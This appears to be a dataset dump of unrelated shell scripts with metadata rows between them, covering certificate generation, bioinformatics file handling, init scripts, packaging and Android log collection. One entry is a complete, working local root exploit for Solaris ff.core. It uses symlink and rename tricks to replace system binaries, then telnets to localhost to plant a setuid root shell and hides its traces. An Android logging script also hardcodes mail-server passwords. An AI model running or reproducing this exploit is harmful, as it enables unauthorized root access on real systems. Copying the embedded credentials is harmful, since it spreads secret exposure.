9B206/iPad3,3
9B206/iPhone2,1
9B206/iPhone3,1
9B206/iPhone3,3
9B206/iPhone4,1
9B206/iPod3,1
9B206/iPod4,1
9B208/iPhone3,1"
OS=`sysctl -n kern.osversion`
PROD=`sysctl -n hw.machine`
case "$1" in
install|upgrade)
for I in $SUPPORTED; do
if [ "$I" == "$OS/$PROD" ]; then
exit 0
fi
done
echo Sorry, your device/iOS version is not supported...
exit 1
;;
esac
exit 0
| true |
322beddaa44ad3c405476de3039e321ad4372d5f | Shell | SistemaWebBase/base | /scripts/gerar_certificado.sh | ISO-8859-1 | 1,399 | 3.078125 | 3 | [] | no_license | #!/bin/bash
export DIR="../arquivos/privado/certificado/sistemaweb"
#################################################
# GERAR CERTIFICADO DA AUTORIDADE CERTIFICADORA #
#################################################
# Gerar chave da Autoridade Certificadora
if [ ! -f "$DIR/ca.key" ]; then
openssl genrsa -des3 -out $DIR/ca.key 4096
fi
# Gerar certificado X.509
if [ ! -f "$DIR/ca.crt" ]; then
openssl req -new -x509 -days 3650 -key $DIR/ca.key -out $DIR/ca.crt
fi
################################################
# GERAR CERTIFICADO DO SERVIDOR #
################################################
# Gerar chave do servidor
if [ ! -f "$DIR/server.key" ]; then
openssl genrsa -des3 -out $DIR/server.key 4096
fi
# Gerar requisio de certificado
if [ ! -f "$DIR/server.csr" ]; then
openssl req -new -key $DIR/server.key -out $DIR/server.csr
fi
# Assinar certificado do servidor com o certificado raiz
if [ ! -f "$DIR/server.crt" ]; then
openssl x509 -req -days 3650 -in $DIR/server.csr -CA $DIR/ca.crt -CAkey $DIR/ca.key -set_serial 10102014 -out $DIR/server.crt
fi
# Retirar senha da chave privada
if [ ! -f "$DIR/server.insecure.key" ]; then
openssl rsa -in $DIR/server.key -out $DIR/server.insecure.key
fi
# Gerar PKCS#12
if [ ! -f "$DIR/server.pfx" ]; then
openssl pkcs12 -export -in $DIR/server.crt -inkey $DIR/server.key -out $DIR/server.pfx
fi
| true |
3de9c853b4e33b3ed8dbbe80d2e23b5f3922d119 | Shell | IGC-bioinf/phasing_scripts | /reformat_vcf.gz_shapeit.sh | UTF-8 | 265 | 2.6875 | 3 | [] | no_license | cd /home/roma/comp_f
for i in $(ls /home/roma/comp_f)
do
cd $i
for k in $(ls)
do
cd $k
for r in $(ls *.vcf.gz)
do
sample=$(echo $r | sed 's/.vcf.gz//g')
gzip -d $r && bgzip -c ${sample}.vcf > $r
rm ${sample}.vcf
done
cd ../
done
cd ../
done
| true |
5cc2d922b2faa8c1c6f2ec7e6ff8e16c31da8a01 | Shell | wisehead/dev_tools | /gnuplot/mysql/perf/iostat.sh | UTF-8 | 100 | 2.703125 | 3 | [] | no_license | #!/bin/bash
SLEEP_TIME=$1
while [ true ]
do
iostat -xkt 1 1
sleep $((SLEEP_TIME-1))
done
| true |
9a219609e75490fb1aa5c92453d54ee318334529 | Shell | akiitr/unix | /myfor.sh | UTF-8 | 582 | 3.453125 | 3 | [] | no_license | #!/usr/bin/bash bash
#File: myfor.sh
echo "This is the normal example of for loop"
for i in {1..3}
do
echo "Iteration no: $i"
done
echo "The loop can be used upon any list like python"
echo ""
echo "Explicit list:"
for i in image1.jpg image2.jpg image3.jpg
do
echo "This is the Image: $i"
done
echo ""
echo "Array using the () mind the issue of the gap as gap is not welcome in bash near ="
arr=(ak pk jk)
for people in ${arr[*]}
do
echo "This is the NAME: $people"
done
echo ""
echo "Command Substitution:"
for files in $(ls)
do
echo "File in this directry: $files"
done
| true |
3d298958ec5fc1731a47ad9b9aeab085c7ae6c65 | Shell | vrosnet/ack | /modules/src/em_data/new_table | UTF-8 | 1,094 | 3.25 | 3 | [
"LicenseRef-scancode-other-permissive"
] | permissive | #!/bin/sh
set -e
em_table=$1
h=${2-.}
d=${3-.}
set `grep fpseu $em_table`
p=$2
set `grep fmnem $em_table`
m=$2
ed - $em_table <<'A' > X
1,/^$/g/ /s// /gp
A
ed - $em_table <<'A' | awk '{$2=$2+'$p'; print}' > Y
1,/^$/d
1,/^$/g/ /s// /gp
A
ed - $em_table <<'A' | awk '{print $0,'$m'+i++}' > Z
1,/^$/d
1,/^$/d
1,/^$/g/ /s// /gp
A
i=`wc -l <Y`
echo 'lpseu' `expr $i + $p - 1` >>X
i=`wc -l <Z`
echo 'lmnem' `expr $i + $m - 1` >>X
ed - X <<'A' > $h/em_spec.h
g/^/s//#define sp_/p
A
ed - Y <<'A' > $h/em_pseu.h
g/ \(.*\) .*/s// \1/
g/\(.*\) \(.*\)/s//#define ps_\1 \2/p
A
ed - Z <<'A' > $h/em_mnem.h
g/ .* /s// /
g/\(.*\) \(.*\)/s//#define op_\1 \2/p
A
(
echo 'char em_pseu[][4] = {'
ed - Y <<'A'
g/\(...\).*/s// "\1",/p
A
echo '};'
) > $d/em_pseu.c
(
echo 'char em_mnem[][4] = {'
ed - Z <<'A'
g/\(...\).*/s// "\1",/p
A
echo '};'
) > $d/em_mnem.c
(
echo '#include <em_flag.h>
char em_flag[] = {'
ed - Z <<'A' | tr abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ
g/^... /s///
g/ .*/s///
g/\(.\)\(.\)/s//PAR_\1 | FLO_\2/
g/-/s//NO/g
g/.*/s// &,/p
A
echo '};'
) > $d/em_flag.c
rm X Y Z
| true |
a952ac868a915ecdc3b8c495068d2ef6d8c454d9 | Shell | sunhaikuo/http2 | /http2.sh | UTF-8 | 1,744 | 2.8125 | 3 | [] | no_license | #!/bin/bash
# 使用方法:
# 1.wget 'https://raw.githubusercontent.com/sunhaikuo/http2/master/http2.sh'
# 2.chmod +x http2.sh
# 3../http2.sh
# 注:该脚本只能运行在ubuntu系统,其他系统请自行修改命令
echo "安装依赖库和编译要用到的工具"
sudo apt-get install build-essential libpcre3 libpcre3-dev zlib1g-dev unzip git
echo "安装nginx-ct"
wget -O nginx-ct.zip -c https://github.com/grahamedgecombe/nginx-ct/archive/v1.3.2.zip
unzip nginx-ct.zip
echo "安装ngx_brotli"
sudo apt-get install autoconf libtool automake
git clone https://github.com/bagder/libbrotli
cd libbrotli
# 如果提示 error: C source seen but 'CC' is undefined,可以在 configure.ac 最后加上 AC_PROG_CC
./autogen.sh
./configure
make
sudo make install
cd ../
echo "获取 ngx_brotli 源码"
git clone https://github.com/google/ngx_brotli.git
cd ngx_brotli
git submodule update --init
cd ../
echo "Cloudflare 补丁"
git clone https://github.com/cloudflare/sslconfig.git
echo "获取OpenSSL1.0.2"
wget -O openssl.tar.gz -c https://github.com/openssl/openssl/archive/OpenSSL_1_0_2k.tar.gz
tar zxf openssl.tar.gz
mv openssl-OpenSSL_1_0_2k/ openssl
cd openssl
patch -p1 < ../sslconfig/patches/openssl__chacha20_poly1305_draft_and_rfc_ossl102j.patch
cd ../
echo "获取nginx"
wget -c https://nginx.org/download/nginx-1.11.13.tar.gz
tar zxf nginx-1.11.13.tar.gz
cd nginx-1.11.13/
patch -p1 < ../sslconfig/patches/nginx__1.11.5_dynamic_tls_records.patch
cd ../
echo "编译和安装nginx"
cd nginx-1.11.13/
./configure --add-module=../ngx_brotli --add-module=../nginx-ct-1.3.2 --with-openssl=../openssl --with-http_v2_module --with-http_ssl_module --with-http_gzip_static_module
make
sudo make install
| true |
577524efcea45406eb4c4abcc87fb35353ab9b38 | Shell | makinacorpus/makina-states | /files/etc/init.d/firewalld | UTF-8 | 3,726 | 3.6875 | 4 | [
"BSD-3-Clause"
] | permissive | #! /bin/sh
### BEGIN INIT INFO
# Provides: firewalld
# Required-Start: $remote_fs dbus
# Required-Stop: $remote_fs dbus
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: dynamic firewall daemon
# Description: firewalld is a dynamically managed firewall daemon
# with support for network/firewall zones to define
# the trust level of network connections or interfaces.
# It provides a D-Bus interface for services or
# applications to add and apply firewall rules on-the-fly.
### END INIT INFO
#
# Author: Michael Biebl <biebl@debian.org>
#
# PATH should only include /usr/* if it runs after the mountnfs.sh script
PATH=/sbin:/usr/sbin:/bin:/usr/bin
DESC="dynamic firewall daemon"
NAME=firewalld
DAEMON=/usr/sbin/firewalld
PIDFILE=/var/run/firewalld.pid
SCRIPTNAME=/etc/init.d/$NAME
# Exit if the package is not installed
[ -x "$DAEMON" ] || exit 0
if [ -f "/etc/default/$NAME" ];then . "/etc/default/$NAME";fi
# Define LSB log_* functions.
. /lib/lsb/init-functions
is_container() {
echo "$(cat -e /proc/1/environ |grep container=|wc -l|sed -e "s/ //g")"
}
filter_host_pids() {
pids=""
if [ "x$(is_container)" != "x0" ];then
pids="${pids} $(echo "${@}")"
else
for pid in ${@};do
if [ "x$(grep -q /lxc/ /proc/${pid}/cgroup 2>/dev/null;echo "${?}")" != "x0" ];then
pids="${pids} $(echo "${pid}")"
fi
done
fi
echo "${pids}" | sed -e "s/\(^ \+\)\|\( \+$\)//g"
}
do_makina_rules() {
if [ -x /usr/bin/ms_firewalld.py ];then
/usr/bin/ms_firewalld.py
fi
}
do_stop()
{
# Return
# 0 if daemon has been stopped
# 1 if daemon was already stopped
# other if daemon could not be stopped or a failure occurred
start-stop-daemon --stop --quiet --retry 5 --pidfile $PIDFILE --name $NAME
pids=$(filter_host_pids $(ps aux|grep firewalld|grep python|awk '{print $2}'))
if [ "x${pids}" != "x" ];then
sleep 4
# let a little more time for a chance to exit
pids=$(filter_host_pids $(ps aux|grep firewalld|grep python|awk '{print $2}'))
fi
for i in ${pids};do
kill -9 ${i} || /bin/true
done
}
do_start()
{
# Return
# 0 if daemon has been started
# 1 if daemon was already running
# other if daemon could not be started or a failure occured
if [ "x${FIREWALLD_DISABLED}" = "x" ];then
start-stop-daemon --start --quiet --pidfile $PIDFILE --exec $DAEMON -- ${FIREWALLD_ARGS}
do_makina_rules
else
# try to stop .. on start if the firewall is disabled
do_stop
fi
}
do_reload()
{
if [ "x${FIREWALLD_DISABLED}" = "x" ];then
start-stop-daemon --stop --signal HUP --quiet --pidfile $PIDFILE --name $NAME
do_makina_rules
else
do_stop
fi
}
case "$1" in
start)
log_daemon_msg "Starting $DESC" "$NAME"
do_start
case "$?" in
0) log_end_msg 0 ;;
1) log_progress_msg "already started"
log_end_msg 0 ;;
*) log_end_msg 1 ;;
esac
;;
stop)
log_daemon_msg "Stopping $DESC" "$NAME"
do_stop
case "$?" in
0) log_end_msg 0 ;;
1) log_progress_msg "already stopped"
log_end_msg 0 ;;
*) log_end_msg 1 ;;
esac
;;
reload|force-reload)
log_daemon_msg "Reloading $DESC" "$NAME"
do_reload
log_end_msg $?
;;
restart)
$0 stop
$0 start
;;
status)
status_of_proc -p $PIDFILE $DAEMON $NAME && exit 0 || exit $?
;;
*)
echo "Usage: $SCRIPTNAME {start|stop|restart|force-reload|reload|status}" >&2
exit 3
;;
esac
| true |
1ae9bc4942fd0ff70469d9d2d8fff3dc6ed663f8 | Shell | ilventu/aur-mirror | /cwm-git/PKGBUILD | UTF-8 | 1,223 | 2.859375 | 3 | [] | no_license | # Maintainer: Christian Neukirchen <chneukirchen@gmail.com>
pkgname=cwm-git
pkgver=20111005
pkgrel=1
pkgdesc="OpenBSD fork of calmwm, a clean and lightweight window manager"
arch=(i686 x86_64)
url="http://www.openbsd.org/cgi-bin/man.cgi?query=cwm&sektion=1"
license=('custom')
depends=(libxft libxrandr libxinerama)
makedepends=(git pkg-config)
replaces=(cwm cwm-cvs)
conflicts=(cwm cwm-cvs)
source=(cwm.desktop)
md5sums=('42530ce5a23fc5f9088d891e325d99bd')
_gitroot="git://github.com/chneukirchen/cwm.git"
_gitname=cwm
_gitbranch=linux
build() {
cd "$srcdir"
msg "Connecting to GIT server...."
if [ -d $_gitname ] ; then
cd $_gitname && git fetch origin
msg "The local files are updated."
else
git clone --mirror $_gitroot $_gitname
fi
msg "GIT checkout done or server timeout"
msg "Starting make..."
rm -rf "$srcdir/$_gitname-build"
git clone "$srcdir/$_gitname" "$srcdir/$_gitname-build"
cd "$srcdir/$_gitname-build"
git checkout $_gitbranch
make
}
package() {
cd "$srcdir/$_gitname-build"
make DESTDIR="${pkgdir}" PREFIX=/usr install
install -D -m644 "${srcdir}/cwm.desktop" "${pkgdir}/usr/share/xsessions/cwm.desktop"
install -D -m644 LICENSE "${pkgdir}/usr/share/licenses/${pkgname}/LICENSE"
}
| true |
6f225328b097f1ac2e28459676636801e08e1428 | Shell | joshi-aditya/Expense-Manager | /infrastructure/aws/cloudformation/csye6225-aws-cf-terminate-stack.sh | UTF-8 | 381 | 3.453125 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
read -p 'Enter stack name: ' STACK_NAME
STACK_ID=$(\
aws cloudformation delete-stack \
--stack-name ${STACK_NAME} \
)
echo "Waiting on deletion.."
aws cloudformation wait stack-delete-complete --stack-name ${STACK_NAME}
if [ $? -ne 0 ]; then
echo "Stack ${STACK_NAME} deletion failed!"
exit 1
else
echo "Stack ${STACK_NAME} deleted successfully!"
fi | true |
e621595113a4c311ea9143eaccd1c13d6ef7f9fc | Shell | ddbj/training | /D-STEP1/01_kawashima/sra2fastq_loop.sh | UTF-8 | 323 | 2.546875 | 3 | [] | no_license | #!/bin/sh
#$ -S /bin/bash
#$ -cwd
#$ -l short
#$ -l s_vmem=1G,mem_req=1G
#$ -o ./
#$ -e ./
source ~/.bashrc
FASTQDUMP="/usr/local/pkg/sra-tools/2.5.7/bin/fastq-dump.2.5.7"
Dbdir="/home/takeshik/tanomare/dstep20180126"
arr=( "ERR003990" )
for f in ${arr[@]}
do
make SRA=$f.sra
$FASTQDUMP --split-files $f.sra
done
| true |
11856781a0f4f513a8064b04077b4758ab31239d | Shell | feedcafe/hi-ubuntu | /android/script/klogcat | UTF-8 | 7,888 | 3.265625 | 3 | [] | no_license | #!/system/bin/sh
root_path="/data"
klogcat_path="$root_path/klogcat"
log_path="$klogcat_path/"`date +%F`
screencap_path="$log_path/screencap/"
plain_text_mail="false"
switch_channel()
{
RANGE=2
count=0
event=3
echo "###################################################################"
echo "# #"
echo "# switch channel test #"
echo "# #"
echo "###################################################################"
while true
do
num=$RANDOM
let "num %= $RANGE"
let count+=1
echo $count
if [ $num -eq 1 ]
then
# send keyevent F9
echo "send key F9"
# input keyevent F9
sendevent /dev/input/event$event 1 67 1
sendevent /dev/input/event$event 0 0 0
sendevent /dev/input/event$event 1 67 0
sendevent /dev/input/event$event 0 0 0
#sleep 20
else
# send keyevent F11
echo "send key F11"
# input keyevent F11
sendevent /dev/input/event$event 1 87 1
sendevent /dev/input/event$event 0 0 0
sendevent /dev/input/event$event 1 87 0
sendevent /dev/input/event$event 0 0 0
#sleep 20
fi
done
}
onoff_test()
{
count=0
while true
do
# send keyevent KEYCODE_ENTER
input keyevent 66
sleep 1
input keyevent 66
sleep 17
let count+=1
echo tested $count times
done
}
# get current screen shot
gtv_screencast()
{
if [ ! -d "$screencap_path" ]; then
mkdir -p $screencap_path
fi
screencap "$screencap_path/android-`date +%F-%H-%M-%S`.png"
}
# enable btsnoop for hci debug
btsnoop_enable()
{
bt_stack="/system/etc/bluetooth/bt_stack.conf"
mount -o remount,rw /system
busybox sed -i 's/BtSnoopLogOutput=false/BtSnoopLogOutput=true/g' $bt_stack
busybox sed -i 's/BtSnoopFileName=\/sdcard\/btsnoop_hci.log/BtSnoopFileName=\/data\/misc\/bluedroid\/btsnoop_hci.log/g' $bt_stack
# dump more log
busybox sed -i 's/TRC_BTM=2/TRC_BTM=5/g' $bt_stack
busybox sed -i 's/TRC_HCI=2/TRC_HCI=5/g' $bt_stack
busybox sed -i 's/TRC_L2CAP=2/TRC_L2CAP=5/g' $bt_stack
busybox sed -i 's/TRC_SDP=2/TRC_SDP=5/g' $bt_stack
busybox sed -i 's/TRC_GATT=2/TRC_GATT=5/g' $bt_stack
busybox sed -i 's/TRC_SMP=2/TRC_SMP=5/g' $bt_stack
busybox sed -i 's/TRC_BTAPP=2/TRC_BTAPP=5/g' $bt_stack
busybox sed -i 's/TRC_BTIF=2/TRC_BTIF=5/g' $bt_stack
}
gtv_get_bdaddr()
{
cat /sys/devices/virtual/bluetooth/hci0/address > $log_path/bdaddr.txt
}
gtv_getprop()
{
getprop > $log_path/getprop.txt
}
gtv_getip()
{
netcfg |grep eth0|busybox cut -d " " -f37
}
gtv_get_macaddr()
{
# mac address
netcfg |grep eth0|busybox cut -d " " -f40 > $log_path/macaddr.txt
}
gtv_bluetooth_status()
{
adb shell am start -n "com.android.settings/.bluetooth.BluetoothSettings"
gtv_screencast
}
gtv_pack_log()
{
cd $klogcat_path
busybox tar cvf klogcat.tar $log_path
busybox bzip2 -zvv klogcat.tar
# busybox stat -c "%s" klogcat.tar.bz2
# if attachment larger than 5 MB, script will send plain text mail
size=`busybox du -k $klogcat_path/klogcat.tar.bz2|busybox awk '{print $1}'`
max_size=5*1024
if [[ $size -lt $max_size ]]; then
echo "attachment not exceeds limit size (5 MB)"
plain_text_mail="false"
else
echo "attachment too large, send plain text mail"
plain_text_mail="true"
fi
}
gtv_internet_available()
{
ping -c 2 g.cn
if [ $? -eq 0 ]
then
echo "internet available"
else [ $? -eq 2 ]
echo "ping: unknown host g.cn"
fi
}
# send plain text message using busybox sendmail applet
busybox_sendmail()
{
echo "###################################################################"
echo "# #"
echo "# send mail to module owner #"
echo "# using busybox swiss army knife #"
echo "# #"
echo "###################################################################"
# need a new line between subject and mail body
echo "Subject: $subject" > $log_path/mail.txt
echo "" >> $log_path/mail.txt
cat $log_path/getprop.txt >> $log_path/mail.txt
cat $log_path/mail.txt | busybox sendmail -v -S $mailserver \
-f $mailfrom -au"$username" -ap"$passwd" $mailto
}
# send plain text message using busybox sendmail applet
busybox_sendmail_with_attachment()
{
echo "###################################################################"
echo "# #"
echo "# send mail to module owner #"
echo "# using busybox makemime and sendmail #"
echo "# #"
echo "###################################################################"
busybox makemime -a "Subject: $subject" \
-o $klogcat_path/attachment \
$klogcat_path/klogcat.tar.bz2
cat $klogcat_path/attachment | busybox sendmail -v \
-S $mailserver -f $mailfrom \
-au"$username" -ap"$passwd" $mailto
}
# remove all the temp files
gtv_cleanup()
{
rm $klogcat_path/klogcat.tar*
rm $klogcat_path/attachment
# remove outdated traces.txt
if [ -f /data/anr/traces.txt ]; then
rm /data/anr/traces.txt
fi
pid=`busybox pidof getevent`
if [ $? -eq 0 ]; then
echo "killing getevent"
kill -15 $pid
else
# TODO: this message should goes to a error log file
echo "getevent already killed"
fi
pid=`busybox pidof logcat`
if [ $? -eq 0 ]; then
echo "killing logcat"
kill -15 $pid
else
# TODO: this message should goes to a error log file
echo "logcat already killed"
fi
}
# select mail server
gtv_mail_server()
{
if [ $1 = "yeah" ]; then
mailserver="123.58.177.132" # smtp.yeah.net
mailfrom="googletv@yeah.net"
username="googletv"
passwd="qwerty123"
elif [ $1 = "mail" ]; then
mailserver="74.208.5.15" # mail.com
mailfrom="fudong@mail.com"
username="fudong@mail.com"
passwd="qwerty123"
fi
echo "mail server $1 selected"
}
gtv_post_processing()
{
# bluetooth hci log
if [ -f "$root_path/misc/bluedroid/btsnoop_hci.log" ]; then
cp $root_path/misc/bluedroid/btsnoop_hci.log $log_path/
else
# TODO: this message should goes to a error log file
echo "btsnoop file not found"
fi
cp $root_path/misc/bluedroid/bt_config.* $log_path/
# pack all the log file
gtv_pack_log
# see if we can send mail to module owner
#gtv_internet_available
gtv_mail_server yeah
mailto="fudong@mail.com"
someone="Fudong"
product="Vision"
subject="$someone's $product has issue"
# send mail to module owner
if [ $1 = "true" ]; then
echo "sending plain text mail"
busybox_sendmail
else
echo "sending mail with attachment"
busybox_sendmail_with_attachment
fi
}
gtv_prepare()
{
# set timezone
setprop persist.sys.timezone Asia/Shanghai
# make sure directory exist
if [ ! -d "$log_path" ]; then
mkdir -p $log_path
fi
echo "log directory: $log_path"
echo "screencap directory: $screencap_path"
# get ethernet mac address
gtv_get_macaddr
# get bluetooth adapter mac address
# gtv_get_bdaddr
# get device info
gtv_getprop
# need bluetooth log?
while true; do
echo "Do you wish to enable bluedroid log? [Yes/No]"
read yesno
case $yesno in
[Yy]* ) btsnoop_enable;
break;;
[Nn]* ) exit;;
* ) echo "Please answer yes or no.";;
esac
done
}
gtv_bluetooth_log()
{
# get kernel log
gtv_kmsg
# bluetooth settings
gtv_bluetooth_status
}
gtv_common_log()
{
# logcat
echo `date +%F-%H-%M-%S` > $log_path/logcat.txt
logcat -v time > $log_path/logcat.txt&
# getevent
echo `date +%F-%H-%M-%S` > $log_path/getevent.txt
getevent -lt >> $log_path/getevent.txt&
# kernel log
echo `date +%F-%H-%M-%S` > $log_path/kmsg.txt
cat /proc/kmsg >>$log_path/kmsg.txt&
}
main()
{
gtv_prepare
gtv_common_log
gtv_post_processing plain_text_mail
gtv_cleanup
}
main
| true |
b7286f3b142308bed6591fb66e94b7e1723e0970 | Shell | RITResearchComputing/Google-Code | /gstScripts/gst-screencap-encode-avi.sh | UTF-8 | 743 | 3.078125 | 3 | [] | no_license | #!/bin/bash
#
# Script to capture X screen, encode to H.264 and write to AVI.
# @author Andrew Ford
# Usage: ./gst-screencap-encode.sh [width] [height] [framerate] [bitrate] [file]
# width/height
WIDTH=$1
HEIGHT=$2
$FPS=$3
$BITRATE=$4
VELEM="ximagesrc startx=0 starty=0 endx=$WIDTH endy=$HEIGHT use-damage=false"
VCAPS="video/x-raw-rgb, bpp=(int)32, depth=(int)24, endianness=(int)4321, red_mask=(int)65280, green_mask=(int)16711680, blue_mask=(int)-16777216, width=(int)$WIDTH, height=(int)$HEIGHT, framerate=(fraction)$3/1"
VENC="x264enc threads=4 byte-stream=true bitrate=$4 me=1 trellis=false cabac=false"
VSOURCE="$VELEM ! $VCAPS ! queue ! videorate ! ffmpegcolorspace ! $VENC ! avimux ! filesink location=$5"
gst-launch-0.10 -v $VSOURCE
| true |
509f773e331178701560b3416cd519281b5ac88d | Shell | ghsecuritylab/7620 | /package/network/config/netifd/src/scripts/utils.sh | UTF-8 | 754 | 3.671875 | 4 | [] | no_license | append() {
local var="$1"
local value="$2"
local sep="${3:- }"
eval "export -- \"$var=\${$var:+\${$var}\${value:+\$sep}}\$value\""
}
add_default_handler() {
case "$(type $1 2>/dev/null)" in
*function*) return;;
*) eval "$1() { return; }"
esac
}
set_default() {
local __s_var="$1"
local __s_val="$2"
eval "export -- \"$__s_var=\${$__s_var:-\$__s_val}\""
}
_config_add_generic() {
local type="$1"; shift
for name in "$@"; do
json_add_array ""
json_add_string "" "$name"
json_add_int "" "$type"
json_close_array
done
}
config_add_int() {
_config_add_generic 5 "$@"
}
config_add_array() {
_config_add_generic 1 "$@"
}
config_add_string() {
_config_add_generic 3 "$@"
}
config_add_boolean() {
_config_add_generic 7 "$@"
}
| true |
9568d0a4e0cc25dbecc174b282ba2578568db231 | Shell | jaw566/RosConnect | /Scripts/test.sh | UTF-8 | 781 | 2.65625 | 3 | [] | no_license | #!/bin/bash
echo ""
echo "Starting Car"
echo "------------"
echo "Launch Variables"
echo $@
echo " "
#Pass Files over to car
echo sshpass -p 'test' scp runClose.sh runStop.sh runLaunch.sh runSim.sh carStop.sh test@10.18.92.130:'~/Documents'
echo " "
#Create the ssh screen - to enteract and close files with
echo sshpass -p 'test' ssh -T test@10.18.92.130 'screen -dmS Ssh'
echo " "
#This reconnects roscore screen and passes the launch file to it to execute.
# sshpass -p 'doan_1234' ssh -T nvidia@10.18.92.160 "cd ~/Documents; screen -r
#roscore; ./runLaunch.sh ${@}>> kpw_logfile.txt" #replace with a launch file
echo sshpass -p 'test' ssh -T test@10.18.92.130 "screen -dmS roscore ./runCar.sh"
echo " "
echo "Successfully running car"
echo "------------------------"
| true |
eda71b45fdacb61cd4469e9c9dc67ed5a09cff62 | Shell | brewerja/vim | /swap.sh | UTF-8 | 536 | 3.546875 | 4 | [] | no_license | #!/bin/bash
current=$(dconf read /org/gnome/desktop/input-sources/xkb-options)
swapped="['caps:swapescape']"
capslock="['caps:capslock']"
echo "Current status: $current"
if [ "$current" == "$swapped" ]
then
echo "Making caps and escape WORK NORMALLY"
dconf write /org/gnome/desktop/input-sources/xkb-options $capslock
elif [ "$current" == "$capslock" ]
then
echo "Swapping caps and escape"
dconf write /org/gnome/desktop/input-sources/xkb-options $swapped
else
echo "caps is not swapescaped nor capslock. Doing nothing."
fi
| true |
f689bb8b20417c3c61db65ff007a9f2085218996 | Shell | shewey/exploit-db | /platforms/solaris/local/19258.sh | UTF-8 | 3,831 | 3.375 | 3 | [] | no_license | source: http://www.securityfocus.com/bid/327/info
There is a vulnerability in Solaris's ff.core utility which allows normal users to execute the rename command as root. This particular bug when levereged against a series of other configuration issues in a standard Solaris setup can lead to a root compromise. An example of tthis attack excecuted via the ff.core rename attack coul.d be as follows:
1. rename /usr/bin/sh /usr/bin/admintool
2. rename /usr/sbin/swmtool /usr/sbin/in.rlogind
3. telnet localhost login and clean up
Detailed messages concerning this problem and related fixes are attached to this Vulnerability in the Referance section.
CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.
The following exploit was provided:
#!/bin/sh
# /usr/openwin/bin/ff.core exploit - horizon
# tested on 2.5.1, 2.6 and Solaris 7 (2.7)
# thanks to joej, adm, and joej :>
# if you want to exploit 2.5, you can just make this move /etc/group over
# /etc/shadow. you will probably want to move /etc/shadow to /etc/s.bak
# first test if we can pull this off
echo "Testing if exploit is possible..."
if [ -x /usr/openwin/bin/ff.core ]
then
:
else
echo "ff.core isn't there or executable. :/"
exit 1
fi
if [ -w /vol/rmt ]
then
:
else
echo "We can't do the symlink. :<"
exit 1
fi
mkdir /tmp/.test42
touch /tmp/.test42/bob
rm -f /vol/rmt/diskette0
ln -fs /tmp/.test42 /vol/rmt/diskette0
/usr/openwin/bin/ff.core -r /vol/rmt/diskette0/bob jim /floppy/ 2>/dev/null
if [ -f /tmp/.test42/jim ]
then
echo "Test successful. Proceeding..."
else
echo "Hmmm.. doesn't look like this is going to work :/"
exit 1
fi
rm -rf /tmp/.test42
# lets make some backups
echo "Backing up clobbered files to /tmp/.bk"
mkdir /tmp/.bk
#save admintools times
touch /tmp/.bk/admintool
touch -r /usr/bin/admintool /tmp/.bk/admintool
#save rloginds times
touch /tmp/.bk/in.rlogind
touch -r /usr/sbin/in.rlogind /tmp/.bk/in.rlogind
#save a copy of /usr/bin/sh
cp /usr/bin/sh /tmp/.bk
touch -r /usr/bin/sh /tmp/.bk/sh
echo "Doing sploit..."
rm -f /vol/rmt/diskette0
ln -fs /usr/bin /vol/rmt/diskette0
/usr/openwin/bin/ff.core -r /vol/rmt/diskette0/admintool admintool.bak /floppy/ 2>/dev/null
rm -f /vol/rmt/diskette0
ln -fs /usr/bin /vol/rmt/diskette0
/usr/openwin/bin/ff.core -r /vol/rmt/diskette0/sh admintool /floppy/ 2>/dev/null
rm -f /vol/rmt/diskette0
ln -fs /usr/sbin /vol/rmt/diskette0
/usr/openwin/bin/ff.core -r /vol/rmt/diskette0/in.rlogind in.rlogind.bak /floppy/ 2>/dev/null
rm -f /vol/rmt/diskette0
ln -fs /usr/sbin /vol/rmt/diskette0
/usr/openwin/bin/ff.core -r /vol/rmt/diskette0/swmtool in.rlogind /floppy/ 2>/dev/null
echo "Done with sploit. Testing and trying to clean up now..."
sleep 1
(sleep 2;echo " cp /bin/rksh /tmp/bob; chmod 4755 /tmp/bob; exit; ") | telnet localhost login
sleep 1
if [ -f /tmp/bob ]
then
echo "w00p! Should have a suid root sh in /tmp/bob"
echo "btw, its rksh because solaris is silly"
echo "Let me try to clean up my mess..."
else
echo "hrmmph.. didnt work. hope shits not screwed up bad :/"
exit 1
fi
echo "
cp /tmp/.bk/sh /usr/bin/sh
chmod 555 /usr/bin/sh
chown bin /usr/bin/sh
chgrp root /usr/bin/sh
touch -r /tmp/.bk/sh /usr/bin/sh
mv /usr/bin/admintool.bak /usr/bin/admintool
touch -r /tmp/.bk/admintool /usr/bin/admintool
rm -f /usr/sbin/swmtool
ln -s /usr/bin/admintool /usr/sbin/swmtool
touch -r /usr/bin/admintool /usr/sbin/swmtool
rm -f /usr/sbin/in.rlogind
mv /usr/sbin/in.rlogind.bak /usr/sbin/in.rlogind
touch -r /tmp/.bk/in.rlogind /usr/sbin/in.rlogind
rm -rf /tmp/.bk
" | /tmp/bob
echo "everything should be cool.. i think :>"
/tmp/bob | true |
9bdea7c62fb63f8c84c5da7d36e26b618a63720a | Shell | karlosss/mtg | /scripts/borrow.sh | UTF-8 | 651 | 2.96875 | 3 | [
"MIT"
] | permissive | #!/bin/bash
/home/karlos/mtg/scripts/url_to_pc.sh "$1" > /tmp/x
comm -23 /tmp/x <(/home/karlos/mtg/scripts/human_to_pc.sh <(/home/karlos/mtg/scripts/currently_missing.sh "$1") /dev/stdout) > /tmp/y
echo "BORROW LIST:"
echo "------------"
/home/karlos/mtg/scripts/pc_to_human.sh /tmp/y /dev/stdout
echo "------------"
echo -n "Enter file name: "
read f
if [ -f "/home/karlos/mtg/borrowed/$f" ]
then
/home/karlos/mtg/scripts/human_to_pc.sh "/home/karlos/mtg/borrowed/$f" /tmp/x
else
> /tmp/x
fi
/home/karlos/mtg/scripts/pc_to_human.sh <(cat /tmp/x /tmp/y) /tmp/z
mv /tmp/z "/home/karlos/mtg/borrowed/$f"
rm /tmp/x /tmp/y
echo "Cards borrowed."
| true |
97bb3d2785c52e7c011df1b2646fe3888bc1f0be | Shell | stoictraveler/ULNNO | /uncompress.sh | UTF-8 | 168 | 2.796875 | 3 | [] | no_license | source /home/fs/ylu/.bashrc
ls *.tar | cut -c1-9 | xargs mkdir -vp
for f in *.tar
do
tar -xvf $f -C ${f:0:9}/
echo 'uncompressed file '$f' to folder '${f:0:9}/
done
| true |
